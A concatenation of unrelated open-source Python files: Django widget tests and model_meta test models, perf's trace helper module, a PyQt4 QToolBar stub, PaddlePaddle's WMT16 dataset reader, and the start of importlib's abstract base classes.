            <option value="G" selected>George</option>
            <option value="R">Ringo</option>
            </select>"""
        ))
    def test_compare_string(self):
        # Integer and string data values should select the same option.
        choices = [('1', '1'), ('2', '2'), ('3', '3')]
        self.check_html(self.widget(choices=choices), 'nums', [2], html=(
            """<select multiple="multiple" name="nums">
            <option value="1">1</option>
            <option value="2" selected>2</option>
            <option value="3">3</option>
            </select>"""
        ))
        self.check_html(self.widget(choices=choices), 'nums', ['2'], html=(
            """<select multiple="multiple" name="nums">
            <option value="1">1</option>
            <option value="2" selected>2</option>
            <option value="3">3</option>
            </select>"""
        ))
        self.check_html(self.widget(choices=choices), 'nums', [2], html=(
            """<select multiple="multiple" name="nums">
            <option value="1">1</option>
            <option value="2" selected>2</option>
            <option value="3">3</option>
            </select>"""
        ))
    def test_optgroup_select_multiple(self):
        widget = SelectMultiple(choices=(
            ('outer1', 'Outer 1'),
            ('Group "1"', (('inner1', 'Inner 1'), ('inner2', 'Inner 2'))),
        ))
        self.check_html(widget, 'nestchoice', ['outer1', 'inner2'], html=(
            """<select multiple="multiple" name="nestchoice">
            <option value="outer1" selected>Outer 1</option>
            <optgroup label="Group "1"">
            <option value="inner1">Inner 1</option>
            <option value="inner2" selected>Inner 2</option>
            </optgroup>
            </select>"""
        ))
    def test_value_omitted_from_data(self):
        # A multi-select with no submitted value is never treated as omitted.
        widget = self.widget(choices=self.beatles)
        self.assertIs(widget.value_omitted_from_data({}, {}, 'field'), False)
        self.assertIs(widget.value_omitted_from_data({'field': 'value'}, {}, 'field'), False)
| bsd-3-clause |
cm-a7lte/device_samsung_a7lte | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Core.py | 11088 | 3246 | # Core.py - Python extension for perf script, core functions
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
from collections import defaultdict
def autodict():
    # Recursive defaultdict: missing keys create nested autodicts on demand.
    return defaultdict(autodict)
# Per-event registries mapping event -> field -> formatting metadata,
# populated by the define_* callbacks below.
flag_fields = autodict()
symbolic_fields = autodict()
def define_flag_field(event_name, field_name, delim):
    # Record the delimiter used when joining multiple flag names.
    flag_fields[event_name][field_name]['delim'] = delim
def define_flag_value(event_name, field_name, value, field_str):
    # Map one bit value of a flag field to its symbolic name.
    flag_fields[event_name][field_name]['values'][value] = field_str
def define_symbolic_field(event_name, field_name):
    # nothing to do, really
    pass
def define_symbolic_value(event_name, field_name, value, field_str):
    # Map one exact value of a symbolic field to its printable name.
    symbolic_fields[event_name][field_name]['values'][value] = field_str
def flag_str(event_name, field_name, value):
    """Translate a bitmask *value* of a flag field into its symbolic form.

    Matched bit names are joined with the field's registered delimiter;
    unmatched bits are silently dropped.
    """
    string = ""
    if flag_fields[event_name][field_name]:
        print_delim = 0
        # sorted() instead of list.sort(): dict.keys() is a view object in
        # Python 3 and has no .sort() method.
        keys = sorted(flag_fields[event_name][field_name]['values'].keys())
        for idx in keys:
            if not value and not idx:
                string += flag_fields[event_name][field_name]['values'][idx]
                break
            if idx and (value & idx) == idx:
                if print_delim and flag_fields[event_name][field_name]['delim']:
                    string += " " + flag_fields[event_name][field_name]['delim'] + " "
                string += flag_fields[event_name][field_name]['values'][idx]
                print_delim = 1
                value &= ~idx
    return string
def symbol_str(event_name, field_name, value):
    """Translate an exact *value* of a symbolic field into its name, or ""."""
    string = ""
    if symbolic_fields[event_name][field_name]:
        # sorted() instead of list.sort(): dict.keys() is a view object in
        # Python 3 and has no .sort() method.
        keys = sorted(symbolic_fields[event_name][field_name]['values'].keys())
        for idx in keys:
            if not value and not idx:
                string = symbolic_fields[event_name][field_name]['values'][idx]
                break
            if (value == idx):
                string = symbolic_fields[event_name][field_name]['values'][idx]
                break
    return string
# Bit values of the common trace-flags field, in display order.
trace_flags = {
    0x00: "NONE",
    0x01: "IRQS_OFF",
    0x02: "IRQS_NOSUPPORT",
    0x04: "NEED_RESCHED",
    0x08: "HARDIRQ",
    0x10: "SOFTIRQ",
}

def trace_flag_str(value):
    """Render the trace-flags bitmask as a " | "-separated list of names."""
    parts = []
    remaining = value
    for bit in trace_flags:
        if not remaining and not bit:
            parts.append("NONE")
            break
        if bit and (remaining & bit) == bit:
            parts.append(trace_flags[bit])
            remaining &= ~bit
    return " | ".join(parts)
def taskState(state):
    """Map a numeric scheduler task state to its letter code, or "Unknown"."""
    states = {
        0: "R",
        1: "S",
        2: "D",
        64: "DEAD",
    }
    return states.get(state, "Unknown")
class EventHeaders:
    """Common per-event header fields: cpu, timestamp, pid and comm."""

    def __init__(self, common_cpu, common_secs, common_nsecs,
                 common_pid, common_comm):
        self.cpu = common_cpu
        self.secs = common_secs
        self.nsecs = common_nsecs
        self.pid = common_pid
        self.comm = common_comm

    def ts(self):
        # Full timestamp in nanoseconds.
        return self.secs * (10 ** 9) + self.nsecs

    def ts_format(self):
        # "seconds.microseconds" display form.
        return "%d.%d" % (self.secs, int(self.nsecs / 1000))
| gpl-2.0 |
ProfessorX/Config | .PyCharm30/system/python_stubs/-1247972723/PyQt4/QtGui/QToolBar.py | 2 | 6912 | # encoding: utf-8
# module PyQt4.QtGui
# from /usr/lib/python2.7/dist-packages/PyQt4/QtGui.so
# by generator 1.135
# no doc
# imports
import PyQt4.QtCore as __PyQt4_QtCore
from QWidget import QWidget
# NOTE: auto-generated introspection stub (PyQt "generator 1.135"): every
# body below is a placeholder whose docstring records the C++ signature;
# the real implementations live in the compiled QtGui module.
class QToolBar(QWidget):
    """
    QToolBar(QString, QWidget parent=None)
    QToolBar(QWidget parent=None)
    """
    def actionAt(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads
        """
        QToolBar.actionAt(QPoint) -> QAction
        QToolBar.actionAt(int, int) -> QAction
        """
        return QAction
    def actionEvent(self, QActionEvent): # real signature unknown; restored from __doc__
        """ QToolBar.actionEvent(QActionEvent) """
        pass
    def actionGeometry(self, QAction): # real signature unknown; restored from __doc__
        """ QToolBar.actionGeometry(QAction) -> QRect """
        pass
    def actionTriggered(self, *args, **kwargs): # real signature unknown
        """ QToolBar.actionTriggered[QAction] [signal] """
        pass
    def addAction(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads
        """
        QToolBar.addAction(QAction)
        QToolBar.addAction(QString) -> QAction
        QToolBar.addAction(QIcon, QString) -> QAction
        QToolBar.addAction(QString, QObject, SLOT()) -> QAction
        QToolBar.addAction(QString, callable) -> QAction
        QToolBar.addAction(QIcon, QString, QObject, SLOT()) -> QAction
        QToolBar.addAction(QIcon, QString, callable) -> QAction
        """
        return QAction
    def addSeparator(self): # real signature unknown; restored from __doc__
        """ QToolBar.addSeparator() -> QAction """
        return QAction
    def addWidget(self, QWidget): # real signature unknown; restored from __doc__
        """ QToolBar.addWidget(QWidget) -> QAction """
        return QAction
    def allowedAreas(self): # real signature unknown; restored from __doc__
        """ QToolBar.allowedAreas() -> Qt.ToolBarAreas """
        pass
    def allowedAreasChanged(self, *args, **kwargs): # real signature unknown
        """ QToolBar.allowedAreasChanged[Qt.ToolBarAreas] [signal] """
        pass
    def changeEvent(self, QEvent): # real signature unknown; restored from __doc__
        """ QToolBar.changeEvent(QEvent) """
        pass
    def childEvent(self, QChildEvent): # real signature unknown; restored from __doc__
        """ QToolBar.childEvent(QChildEvent) """
        pass
    def clear(self): # real signature unknown; restored from __doc__
        """ QToolBar.clear() """
        pass
    def event(self, QEvent): # real signature unknown; restored from __doc__
        """ QToolBar.event(QEvent) -> bool """
        return False
    def iconSize(self): # real signature unknown; restored from __doc__
        """ QToolBar.iconSize() -> QSize """
        pass
    def iconSizeChanged(self, *args, **kwargs): # real signature unknown
        """ QToolBar.iconSizeChanged[QSize] [signal] """
        pass
    def initStyleOption(self, QStyleOptionToolBar): # real signature unknown; restored from __doc__
        """ QToolBar.initStyleOption(QStyleOptionToolBar) """
        pass
    def insertSeparator(self, QAction): # real signature unknown; restored from __doc__
        """ QToolBar.insertSeparator(QAction) -> QAction """
        return QAction
    def insertWidget(self, QAction, QWidget): # real signature unknown; restored from __doc__
        """ QToolBar.insertWidget(QAction, QWidget) -> QAction """
        return QAction
    def isAreaAllowed(self, Qt_ToolBarArea): # real signature unknown; restored from __doc__
        """ QToolBar.isAreaAllowed(Qt.ToolBarArea) -> bool """
        return False
    def isFloatable(self): # real signature unknown; restored from __doc__
        """ QToolBar.isFloatable() -> bool """
        return False
    def isFloating(self): # real signature unknown; restored from __doc__
        """ QToolBar.isFloating() -> bool """
        return False
    def isMovable(self): # real signature unknown; restored from __doc__
        """ QToolBar.isMovable() -> bool """
        return False
    def movableChanged(self, *args, **kwargs): # real signature unknown
        """ QToolBar.movableChanged[bool] [signal] """
        pass
    def orientation(self): # real signature unknown; restored from __doc__
        """ QToolBar.orientation() -> Qt.Orientation """
        pass
    def orientationChanged(self, *args, **kwargs): # real signature unknown
        """ QToolBar.orientationChanged[Qt.Orientation] [signal] """
        pass
    def paintEvent(self, QPaintEvent): # real signature unknown; restored from __doc__
        """ QToolBar.paintEvent(QPaintEvent) """
        pass
    def resizeEvent(self, QResizeEvent): # real signature unknown; restored from __doc__
        """ QToolBar.resizeEvent(QResizeEvent) """
        pass
    def setAllowedAreas(self, Qt_ToolBarAreas): # real signature unknown; restored from __doc__
        """ QToolBar.setAllowedAreas(Qt.ToolBarAreas) """
        pass
    def setFloatable(self, bool): # real signature unknown; restored from __doc__
        """ QToolBar.setFloatable(bool) """
        pass
    def setIconSize(self, QSize): # real signature unknown; restored from __doc__
        """ QToolBar.setIconSize(QSize) """
        pass
    def setMovable(self, bool): # real signature unknown; restored from __doc__
        """ QToolBar.setMovable(bool) """
        pass
    def setOrientation(self, Qt_Orientation): # real signature unknown; restored from __doc__
        """ QToolBar.setOrientation(Qt.Orientation) """
        pass
    def setToolButtonStyle(self, Qt_ToolButtonStyle): # real signature unknown; restored from __doc__
        """ QToolBar.setToolButtonStyle(Qt.ToolButtonStyle) """
        pass
    def toggleViewAction(self): # real signature unknown; restored from __doc__
        """ QToolBar.toggleViewAction() -> QAction """
        return QAction
    def toolButtonStyle(self): # real signature unknown; restored from __doc__
        """ QToolBar.toolButtonStyle() -> Qt.ToolButtonStyle """
        pass
    def toolButtonStyleChanged(self, *args, **kwargs): # real signature unknown
        """ QToolBar.toolButtonStyleChanged[Qt.ToolButtonStyle] [signal] """
        pass
    def topLevelChanged(self, *args, **kwargs): # real signature unknown
        """ QToolBar.topLevelChanged[bool] [signal] """
        pass
    def visibilityChanged(self, *args, **kwargs): # real signature unknown
        """ QToolBar.visibilityChanged[bool] [signal] """
        pass
    def widgetForAction(self, QAction): # real signature unknown; restored from __doc__
        """ QToolBar.widgetForAction(QAction) -> QWidget """
        return QWidget
    def __init__(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads
        pass
| gpl-2.0 |
mewtaylor/django | tests/model_meta/models.py | 192 | 5039 | from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.db import models
class Relation(models.Model):
    # Bare target model used by the *Person models' relational fields below.
    pass
class AbstractPerson(models.Model):
    """Abstract base declaring one field of each kind, suffixed "_abstract"."""
    # DATA fields
    data_abstract = models.CharField(max_length=10)
    fk_abstract = models.ForeignKey(Relation, models.CASCADE, related_name='fk_abstract_rel')
    # M2M fields
    m2m_abstract = models.ManyToManyField(Relation, related_name='m2m_abstract_rel')
    friends_abstract = models.ManyToManyField('self', related_name='friends_abstract', symmetrical=True)
    following_abstract = models.ManyToManyField('self', related_name='followers_abstract', symmetrical=False)
    # VIRTUAL fields
    data_not_concrete_abstract = models.ForeignObject(
        Relation,
        on_delete=models.CASCADE,
        from_fields=['abstract_non_concrete_id'],
        to_fields=['id'],
        related_name='fo_abstract_rel',
    )
    # GFK fields
    content_type_abstract = models.ForeignKey(ContentType, models.CASCADE, related_name='+')
    object_id_abstract = models.PositiveIntegerField()
    content_object_abstract = GenericForeignKey('content_type_abstract', 'object_id_abstract')
    # GR fields
    generic_relation_abstract = GenericRelation(Relation)
    class Meta:
        abstract = True
class BasePerson(AbstractPerson):
    """First concrete level; repeats each field kind with suffix "_base"."""
    # DATA fields
    data_base = models.CharField(max_length=10)
    fk_base = models.ForeignKey(Relation, models.CASCADE, related_name='fk_base_rel')
    # M2M fields
    m2m_base = models.ManyToManyField(Relation, related_name='m2m_base_rel')
    friends_base = models.ManyToManyField('self', related_name='friends_base', symmetrical=True)
    following_base = models.ManyToManyField('self', related_name='followers_base', symmetrical=False)
    # VIRTUAL fields
    data_not_concrete_base = models.ForeignObject(
        Relation,
        on_delete=models.CASCADE,
        from_fields=['base_non_concrete_id'],
        to_fields=['id'],
        related_name='fo_base_rel',
    )
    # GFK fields
    content_type_base = models.ForeignKey(ContentType, models.CASCADE, related_name='+')
    object_id_base = models.PositiveIntegerField()
    content_object_base = GenericForeignKey('content_type_base', 'object_id_base')
    # GR fields
    generic_relation_base = GenericRelation(Relation)
class Person(BasePerson):
    """Second concrete level (multi-table inheritance); suffixes "_inherited"/"_concrete"."""
    # DATA fields
    data_inherited = models.CharField(max_length=10)
    fk_inherited = models.ForeignKey(Relation, models.CASCADE, related_name='fk_concrete_rel')
    # M2M Fields
    m2m_inherited = models.ManyToManyField(Relation, related_name='m2m_concrete_rel')
    friends_inherited = models.ManyToManyField('self', related_name='friends_concrete', symmetrical=True)
    following_inherited = models.ManyToManyField('self', related_name='followers_concrete', symmetrical=False)
    # VIRTUAL fields
    data_not_concrete_inherited = models.ForeignObject(
        Relation,
        on_delete=models.CASCADE,
        from_fields=['model_non_concrete_id'],
        to_fields=['id'],
        related_name='fo_concrete_rel',
    )
    # GFK fields
    content_type_concrete = models.ForeignKey(ContentType, models.CASCADE, related_name='+')
    object_id_concrete = models.PositiveIntegerField()
    content_object_concrete = GenericForeignKey('content_type_concrete', 'object_id_concrete')
    # GR fields
    generic_relation_concrete = GenericRelation(Relation)
class ProxyPerson(Person):
    """Proxy of Person; adds no fields of its own."""
    class Meta:
        proxy = True
class Relating(models.Model):
    """Points at every *Person level, in both named and hidden ('+') variants."""
    # ForeignKey to BasePerson
    baseperson = models.ForeignKey(BasePerson, models.CASCADE, related_name='relating_baseperson')
    baseperson_hidden = models.ForeignKey(BasePerson, models.CASCADE, related_name='+')
    # ForeignKey to Person
    person = models.ForeignKey(Person, models.CASCADE, related_name='relating_person')
    person_hidden = models.ForeignKey(Person, models.CASCADE, related_name='+')
    # ForeignKey to ProxyPerson
    proxyperson = models.ForeignKey(ProxyPerson, models.CASCADE, related_name='relating_proxyperson')
    proxyperson_hidden = models.ForeignKey(ProxyPerson, models.CASCADE, related_name='+')
    # ManyToManyField to BasePerson
    basepeople = models.ManyToManyField(BasePerson, related_name='relating_basepeople')
    basepeople_hidden = models.ManyToManyField(BasePerson, related_name='+')
    # ManyToManyField to Person
    people = models.ManyToManyField(Person, related_name='relating_people')
    people_hidden = models.ManyToManyField(Person, related_name='+')
# ParentListTests models
class CommonAncestor(models.Model):
pass
class FirstParent(CommonAncestor):
first_ancestor = models.OneToOneField(CommonAncestor, models.SET_NULL, primary_key=True, parent_link=True)
class SecondParent(CommonAncestor):
second_ancestor = models.OneToOneField(CommonAncestor, models.SET_NULL, primary_key=True, parent_link=True)
class Child(FirstParent, SecondParent):
    # Diamond multiple inheritance: both parents share CommonAncestor.
    pass
| bsd-3-clause |
PaddlePaddle/Paddle | python/paddle/dataset/wmt16.py | 1 | 13611 | # Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
ACL2016 Multimodal Machine Translation. Please see this website for more
details: http://www.statmt.org/wmt16/multimodal-task.html#task1
If you use the dataset created for your task, please cite the following paper:
Multi30K: Multilingual English-German Image Descriptions.
@article{elliott-EtAl:2016:VL16,
 author = {{Elliott}, D. and {Frank}, S. and {Sima'an}, K. and {Specia}, L.},
 title = {Multi30K: Multilingual English-German Image Descriptions},
 booktitle = {Proceedings of the 6th Workshop on Vision and Language},
 year = {2016},
 pages = {70--74},
}
"""
from __future__ import print_function
import os
import six
import tarfile
import gzip
from collections import defaultdict
import paddle
import paddle.compat as cpt
import paddle.utils.deprecated as deprecated
# Nothing is exported via ``from ... import *``; readers are reached through
# the (deprecated) paddle.dataset API.
__all__ = []
# Mirror of the tokenized ACL2016 Multi30K data and its expected MD5 checksum.
DATA_URL = ("http://paddlemodels.bj.bcebos.com/wmt/wmt16.tar.gz")
DATA_MD5 = "0c38be43600334966403524a40dcd81e"
# Total corpus vocabulary sizes; requested dictionary sizes are clamped to
# these values (see __get_dict_size).
TOTAL_EN_WORDS = 11250
TOTAL_DE_WORDS = 19220
# Special tokens: sentence start, sentence end, unknown word.
START_MARK = "<s>"
END_MARK = "<e>"
UNK_MARK = "<unk>"
def __build_dict(tar_file, dict_size, save_path, lang):
    """Count word frequencies on the training split and write the most
    frequent words to *save_path*, one per line, preceded by the three
    special tokens.

    Args:
        tar_file(str): path of the downloaded wmt16 tarball.
        dict_size(int): total dictionary size, including the 3 special tokens.
        save_path(str): destination file for the dictionary.
        lang(str): "en" selects the first tab-separated column of each line,
            anything else selects the second (German) column.
    """
    word_dict = defaultdict(int)
    with tarfile.open(tar_file, mode="r") as f:
        for line in f.extractfile("wmt16/train"):
            line = cpt.to_text(line)
            line_split = line.strip().split("\t")
            # Skip malformed lines that are not exactly "src\ttrg".
            if len(line_split) != 2: continue
            sen = line_split[0] if lang == "en" else line_split[1]
            for w in sen.split():
                word_dict[w] += 1
    with open(save_path, "wb") as fout:
        # The three special tokens always occupy the first three lines.
        fout.write(
            cpt.to_bytes("%s\n%s\n%s\n" % (START_MARK, END_MARK, UNK_MARK)))
        for idx, word in enumerate(
                sorted(
                    six.iteritems(word_dict), key=lambda x: x[1],
                    reverse=True)):
            # Stop once dict_size entries (3 specials + idx words) are written.
            if idx + 3 == dict_size: break
            fout.write(cpt.to_bytes(word[0]))
            fout.write(cpt.to_bytes('\n'))
def __load_dict(tar_file, dict_size, lang, reverse=False):
    """Load the word dictionary for *lang*, (re)building it first when it is
    missing or has an unexpected number of entries.

    Args:
        tar_file(str): path of the downloaded wmt16 tarball (used by
            __build_dict when a rebuild is needed).
        dict_size(int): expected number of entries, including the three
            special tokens.
        lang(str): "en" or "de".
        reverse(bool): False -> word-to-index mapping; True -> index-to-word.

    Returns:
        dict: the requested word dictionary.
    """
    dict_path = os.path.join(paddle.dataset.common.DATA_HOME,
                             "wmt16/%s_%d.dict" % (lang, dict_size))
    # Rebuild when the file is absent or its line count does not match the
    # requested size. BUGFIX: the original used len(open(...).readlines())
    # and never closed that file handle; use a context manager instead.
    needs_build = not os.path.exists(dict_path)
    if not needs_build:
        with open(dict_path, "rb") as fdict:
            needs_build = len(fdict.readlines()) != dict_size
    if needs_build:
        __build_dict(tar_file, dict_size, dict_path, lang)
    word_dict = {}
    with open(dict_path, "rb") as fdict:
        for idx, line in enumerate(fdict):
            if reverse:
                word_dict[idx] = cpt.to_text(line.strip())
            else:
                word_dict[cpt.to_text(line.strip())] = idx
    return word_dict
def __get_dict_size(src_dict_size, trg_dict_size, src_lang):
    """Clamp the requested source/target dictionary sizes to the total
    vocabulary of the corresponding language.

    The source language is *src_lang* ("en" or "de"); the target language is
    always the other one.
    """
    if src_lang == "en":
        src_cap, trg_cap = TOTAL_EN_WORDS, TOTAL_DE_WORDS
    else:
        src_cap, trg_cap = TOTAL_DE_WORDS, TOTAL_EN_WORDS
    return min(src_dict_size, src_cap), min(trg_dict_size, trg_cap)
def reader_creator(tar_file, file_name, src_dict_size, trg_dict_size, src_lang):
    """Return a generator factory that yields (src_ids, trg_ids, trg_ids_next)
    triples for the split *file_name* inside *tar_file*.

    src_ids is wrapped as <s> ... <e>; trg_ids carries a leading <s> and
    trg_ids_next the trailing <e> (the shifted decoder target).
    """
    def reader():
        src_dict = __load_dict(tar_file, src_dict_size, src_lang)
        trg_dict = __load_dict(tar_file, trg_dict_size,
                               ("de" if src_lang == "en" else "en"))
        # the index for start mark, end mark, and unk are the same in source
        # language and target language. Here uses the source language
        # dictionary to determine their indices.
        start_id = src_dict[START_MARK]
        end_id = src_dict[END_MARK]
        unk_id = src_dict[UNK_MARK]
        # Each line is "english\tgerman"; pick columns by source language.
        src_col = 0 if src_lang == "en" else 1
        trg_col = 1 - src_col
        with tarfile.open(tar_file, mode="r") as f:
            for line in f.extractfile(file_name):
                line = cpt.to_text(line)
                line_split = line.strip().split("\t")
                if len(line_split) != 2:
                    continue
                src_words = line_split[src_col].split()
                src_ids = [start_id] + [
                    src_dict.get(w, unk_id) for w in src_words
                ] + [end_id]
                trg_words = line_split[trg_col].split()
                trg_ids = [trg_dict.get(w, unk_id) for w in trg_words]
                trg_ids_next = trg_ids + [end_id]
                trg_ids = [start_id] + trg_ids
                yield src_ids, trg_ids, trg_ids_next
    return reader
@deprecated(
    since="2.0.0",
    update_to="paddle.text.datasets.WMT16",
    level=1,
    reason="Please use new dataset API which supports paddle.io.DataLoader")
def train(src_dict_size, trg_dict_size, src_lang="en"):
    """
    WMT16 train set reader.
    This function returns the reader for train data. Each sample the reader
    returns is made up of three fields: the source language word index sequence,
    target language word index sequence and next word index sequence.
    NOTE:
    The original link for training data is:
    http://www.quest.dcs.shef.ac.uk/wmt16_files_mmt/training.tar.gz
    paddle.dataset.wmt16 provides a tokenized version of the original dataset by
    using moses's tokenization script:
    https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/tokenizer.perl
    Args:
        src_dict_size(int): Size of the source language dictionary. Three
                            special tokens will be added into the dictionary:
                            <s> for start mark, <e> for end mark, and <unk> for
                            unknown word.
        trg_dict_size(int): Size of the target language dictionary. Three
                            special tokens will be added into the dictionary:
                            <s> for start mark, <e> for end mark, and <unk> for
                            unknown word.
        src_lang(string): A string indicating which language is the source
                          language. Available options are: "en" for English
                          and "de" for Germany.
    Returns:
        callable: The train reader.
    """
    if src_lang not in ["en", "de"]:
        raise ValueError("An error language type. Only support: "
                         "en (for English); de(for Germany).")
    # Clamp the requested sizes to the corpus vocabulary totals.
    src_dict_size, trg_dict_size = __get_dict_size(src_dict_size, trg_dict_size,
                                                   src_lang)
    return reader_creator(
        tar_file=paddle.dataset.common.download(DATA_URL, "wmt16", DATA_MD5,
                                                "wmt16.tar.gz"),
        file_name="wmt16/train",
        src_dict_size=src_dict_size,
        trg_dict_size=trg_dict_size,
        src_lang=src_lang)
@deprecated(
    since="2.0.0",
    update_to="paddle.text.datasets.WMT16",
    level=1,
    reason="Please use new dataset API which supports paddle.io.DataLoader")
def test(src_dict_size, trg_dict_size, src_lang="en"):
    """
    WMT16 test set reader.
    This function returns the reader for test data. Each sample the reader
    returns is made up of three fields: the source language word index sequence,
    target language word index sequence and next word index sequence.
    NOTE:
    The original link for test data is:
    http://www.quest.dcs.shef.ac.uk/wmt16_files_mmt/mmt16_task1_test.tar.gz
    paddle.dataset.wmt16 provides a tokenized version of the original dataset by
    using moses's tokenization script:
    https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/tokenizer.perl
    Args:
        src_dict_size(int): Size of the source language dictionary. Three
                            special tokens will be added into the dictionary:
                            <s> for start mark, <e> for end mark, and <unk> for
                            unknown word.
        trg_dict_size(int): Size of the target language dictionary. Three
                            special tokens will be added into the dictionary:
                            <s> for start mark, <e> for end mark, and <unk> for
                            unknown word.
        src_lang(string): A string indicating which language is the source
                          language. Available options are: "en" for English
                          and "de" for Germany.
    Returns:
        callable: The test reader.
    """
    if src_lang not in ["en", "de"]:
        raise ValueError("An error language type. "
                         "Only support: en (for English); de(for Germany).")
    # Clamp the requested sizes to the corpus vocabulary totals.
    src_dict_size, trg_dict_size = __get_dict_size(src_dict_size, trg_dict_size,
                                                   src_lang)
    return reader_creator(
        tar_file=paddle.dataset.common.download(DATA_URL, "wmt16", DATA_MD5,
                                                "wmt16.tar.gz"),
        file_name="wmt16/test",
        src_dict_size=src_dict_size,
        trg_dict_size=trg_dict_size,
        src_lang=src_lang)
@deprecated(
    since="2.0.0",
    update_to="paddle.text.datasets.WMT16",
    level=1,
    reason="Please use new dataset API which supports paddle.io.DataLoader")
def validation(src_dict_size, trg_dict_size, src_lang="en"):
    """
    WMT16 validation set reader.
    This function returns the reader for validation data. Each sample the reader
    returns is made up of three fields: the source language word index sequence,
    target language word index sequence and next word index sequence.
    NOTE:
    The original link for validation data is:
    http://www.quest.dcs.shef.ac.uk/wmt16_files_mmt/validation.tar.gz
    paddle.dataset.wmt16 provides a tokenized version of the original dataset by
    using moses's tokenization script:
    https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/tokenizer.perl
    Args:
        src_dict_size(int): Size of the source language dictionary. Three
                            special tokens will be added into the dictionary:
                            <s> for start mark, <e> for end mark, and <unk> for
                            unknown word.
        trg_dict_size(int): Size of the target language dictionary. Three
                            special tokens will be added into the dictionary:
                            <s> for start mark, <e> for end mark, and <unk> for
                            unknown word.
        src_lang(string): A string indicating which language is the source
                          language. Available options are: "en" for English
                          and "de" for Germany.
    Returns:
        callable: The validation reader.
    """
    if src_lang not in ["en", "de"]:
        raise ValueError("An error language type. "
                         "Only support: en (for English); de(for Germany).")
    # Clamp the requested sizes to the corpus vocabulary totals.
    src_dict_size, trg_dict_size = __get_dict_size(src_dict_size, trg_dict_size,
                                                   src_lang)
    return reader_creator(
        tar_file=paddle.dataset.common.download(DATA_URL, "wmt16", DATA_MD5,
                                                "wmt16.tar.gz"),
        file_name="wmt16/val",
        src_dict_size=src_dict_size,
        trg_dict_size=trg_dict_size,
        src_lang=src_lang)
@deprecated(
    since="2.0.0",
    update_to="paddle.text.datasets.WMT16",
    level=1,
    reason="Please use new dataset API which supports paddle.io.DataLoader")
def get_dict(lang, dict_size, reverse=False):
    """
    Return the word dictionary for the specified language.
    Args:
        lang(string): A string indicating which language is the source
                      language. Available options are: "en" for English
                      and "de" for Germany.
        dict_size(int): Size of the specified language dictionary.
        reverse(bool): If reverse is set to False, the returned python
                       dictionary will use word as key and use index as value.
                       If reverse is set to True, the returned python
                       dictionary will use index as key and word as value.
    Returns:
        dict: The word dictionary for the specific language.
    """
    # Clamp the requested size to the total vocabulary of the language.
    if lang == "en": dict_size = min(dict_size, TOTAL_EN_WORDS)
    else: dict_size = min(dict_size, TOTAL_DE_WORDS)
    dict_path = os.path.join(paddle.dataset.common.DATA_HOME,
                             "wmt16/%s_%d.dict" % (lang, dict_size))
    # BUGFIX: the message used to be split over bare string statements, so
    # everything after the first fragment was a no-op expression and never
    # reached the AssertionError. Parenthesize to concatenate the parts.
    assert os.path.exists(dict_path), (
        "Word dictionary does not exist. "
        "Please invoke paddle.dataset.wmt16.train/test/validation first "
        "to build the dictionary.")
    tar_file = os.path.join(paddle.dataset.common.DATA_HOME, "wmt16.tar.gz")
    return __load_dict(tar_file, dict_size, lang, reverse)
@deprecated(
    since="2.0.0",
    update_to="paddle.text.datasets.WMT16",
    level=1,
    reason="Please use new dataset API which supports paddle.io.DataLoader")
def fetch():
    """Download the entire dataset into the local data cache.
    """
    # BUGFIX: the original called paddle.v4.dataset.common.download, but no
    # ``paddle.v4`` namespace exists (every other helper in this module uses
    # ``paddle.dataset.common``), so fetch() always raised AttributeError.
    paddle.dataset.common.download(DATA_URL, "wmt16", DATA_MD5,
                                   "wmt16.tar.gz")
| apache-2.0 |
40223105/w16b_test | static/Brython3.1.1-20150328-091302/Lib/importlib/abc.py | 743 | 14595 | """Abstract base classes related to import."""
from . import _bootstrap
from . import machinery
try:
import _frozen_importlib
except ImportError as exc:
if exc.name != '_frozen_importlib':
raise
_frozen_importlib = None
import abc
import imp
import marshal
import sys
import tokenize
import warnings
def _register(abstract_cls, *classes):
    """Register *classes* -- and, when the accelerated _frozen_importlib is
    available, the frozen twins of the same names -- as virtual subclasses
    of *abstract_cls*."""
    for cls in classes:
        abstract_cls.register(cls)
        if _frozen_importlib is not None:
            frozen_cls = getattr(_frozen_importlib, cls.__name__)
            abstract_cls.register(frozen_cls)
class Finder(metaclass=abc.ABCMeta):
    """Legacy abstract base class for import finders.
    It may be subclassed for compatibility with legacy third party
    reimplementations of the import system.  Otherwise, finder
    implementations should derive from the more specific MetaPathFinder
    or PathEntryFinder ABCs.
    """
    @abc.abstractmethod
    def find_module(self, fullname, path=None):
        """An abstract method that should find a module.
        The fullname is a str and the optional path is a str or None.
        Returns a Loader object.
        """
        # Deliberately raises rather than returning None: subclasses must
        # provide their own implementation.
        raise NotImplementedError
class MetaPathFinder(Finder):
    """Abstract base class for import finders on sys.meta_path."""
    @abc.abstractmethod
    def find_module(self, fullname, path):
        """Abstract method which, when implemented, should find a module.
        The fullname is a str and the path is a str or None.
        Returns a Loader object.
        """
        raise NotImplementedError
    def invalidate_caches(self):
        """An optional method for clearing the finder's cache, if any.
        This method is used by importlib.invalidate_caches().
        """
        # Returns the NotImplemented constant (no exception) so callers can
        # detect that the hook is not provided without a try/except.
        return NotImplemented
# Register the concrete meta-path finders shipped with the interpreter as
# virtual subclasses of MetaPathFinder.
_register(MetaPathFinder, machinery.BuiltinImporter, machinery.FrozenImporter,
          machinery.PathFinder, machinery.WindowsRegistryFinder)
class PathEntryFinder(Finder):
    """Abstract base class for path entry finders used by PathFinder."""
    @abc.abstractmethod
    def find_loader(self, fullname):
        """Abstract method which, when implemented, returns a module loader.
